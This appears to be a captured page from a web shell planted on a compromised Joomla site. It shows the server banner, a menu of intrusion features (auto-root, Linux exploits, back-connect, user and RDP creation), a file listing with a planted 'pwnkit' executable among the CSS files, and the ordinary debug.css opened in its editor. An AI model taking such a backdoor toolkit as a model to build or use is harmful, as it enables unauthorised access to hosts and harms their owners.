Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
system /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
fields
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
calendar-jos.css
3.86
KB
-rw----r--
calendar-jos.min.css
1.89
KB
-rw----r--
calendar-jos.min.css.gz
594
B
-rw----r--
debug.css
3.35
KB
-rw----r--
debug.min.css
2.57
KB
-rw----r--
debug.min.css.gz
758
B
-rw----r--
frontediting.css
527
B
-rw----r--
frontediting.min.css
214
B
-rw----r--
frontediting.min.css.gz
150
B
-rw----r--
joomla-core-loader.css
3.56
KB
-rw----r--
joomla-core-loader.min.css
2.71
KB
-rw----r--
joomla-core-loader.min.css.gz
710
B
-rw----r--
joomla-fontawesome.css
88.79
KB
-rw----r--
joomla-fontawesome.min.css
70.67
KB
-rw----r--
joomla-fontawesome.min.css.gz
14.89
KB
-rw----r--
joomla-toolbar-button.css
105
B
-rw----r--
joomla-toolbar-button.min.css
97
B
-rw----r--
joomla-toolbar-button.min.css....
83
B
-rw----r--
mootree.css
492
B
-rw----r--
mootree.min.css
260
B
-rw----r--
mootree.min.css.gz
202
B
-rw----r--
mootree_rtl.css
195
B
-rw----r--
mootree_rtl.min.css
25
B
-rw----r--
mootree_rtl.min.css.gz
45
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
sortablelist.css
2.9
KB
-rw----r--
sortablelist.min.css
1.7
KB
-rw----r--
sortablelist.min.css.gz
624
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : debug.css
/** * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ /* Common CSS for system debug */ div#system-debug { clear: both; } #system-debug { background-color: #fff; color: #000; border: 1px dashed silver; padding: 10px; } #system-debug div.dbg-header { background-color: #ddd; border: 1px solid #eee; font-size: 16px; } #system-debug h3 { margin: 0; } #system-debug a h3 { background-color: #ddd; color: #000; font-size: 14px; padding: 5px; text-decoration: none; margin: 0; } #system-debug .dbg-error a h3 { background-color: red; } #system-debug a:hover h3, #system-debug a:focus h3 { background-color: #4d4d4d; color: #ddd; font-size: 14px; cursor: pointer; text-decoration: none; } #system-debug div.dbg-container { padding: 10px; } #system-debug span.dbg-command { color: blue; font-weight: bold; } #system-debug span.dbg-table { color: green; font-weight: bold; } #system-debug b.dbg-operator { color: red; font-weight: bold; } #system-debug h1 { background-color: #2c2c2c; color: #fff; padding: 10px; margin: 0; font-size: 16px; line-height: 1em; } #system-debug h4 { font-size: 14px; font-weight: bold; margin: 5px 0 0 0; } #system-debug h5 { font-size: 13px; font-weight: bold; margin: 5px 0 0 0; } div#system-debug { margin: 5px; } #system-debug ol { margin-left: 25px; margin-right: 25px; text-align: left; direction: ltr; } #system-debug ul { list-style: none; text-align: left; direction: ltr; } #system-debug li { font-size: 13px; margin-bottom: 10px; } #system-debug code { font-size: 13px; text-align: left; direction: ltr; } #system-debug p { font-size: 13px; } #system-debug div.dbg-header.dbg-error { background-color: red; } #system-debug .dbg-warning { color: red; font-weight: bold; background-color: #ffffcc !important; } #system-debug .accordion { margin-bottom: 0; } #system-debug .dbg-noprofile { text-decoration: line-through; } /* dbg-bars */ #system-debug .alert, #system-debug .dbg-bars { margin-bottom: 10px; } #system-debug .dbg-bar-spacer { float: left; height: 100%; } /* dbg-bars-query */ #system-debug .dbg-bars-query .dbg-bar { opacity: 0.3; height: 12px; margin-top: 3px; } #system-debug .dbg-bars-query:hover .dbg-bar { opacity: 0.6; height: 18px; margin-top: 0; } #system-debug .dbg-bars-query .dbg-bar:hover, #system-debug .dbg-bars-query .dbg-bar-active, #system-debug .dbg-bars-query:hover .dbg-bar-active { opacity: 1; height: 18px; margin-top: 0; } /* dbg-query-table */ #system-debug table.dbg-query-table { margin: 0 0 6px; } #system-debug table.dbg-query-table th, #system-debug table.dbg-query-table td { padding: 3px 8px; } #system-debug .dbg-profile-list .label { display: inline-block; min-width: 60px; text-align: right; } #system-debug .dbg-query-memory, #system-debug .dbg-query-rowsnumber { margin-left: 50px; } #dbg_container_session pre { background: white; border: 0; margin: 0; padding: 0; overflow-wrap: break-word; white-space: pre-wrap; word-break: break-word; } #dbg_container_session pre .blue { color:blue; } #dbg_container_session pre .green { color:green; } #dbg_container_session pre .black { color:black; } #dbg_container_session pre .grey { color:grey; }
Close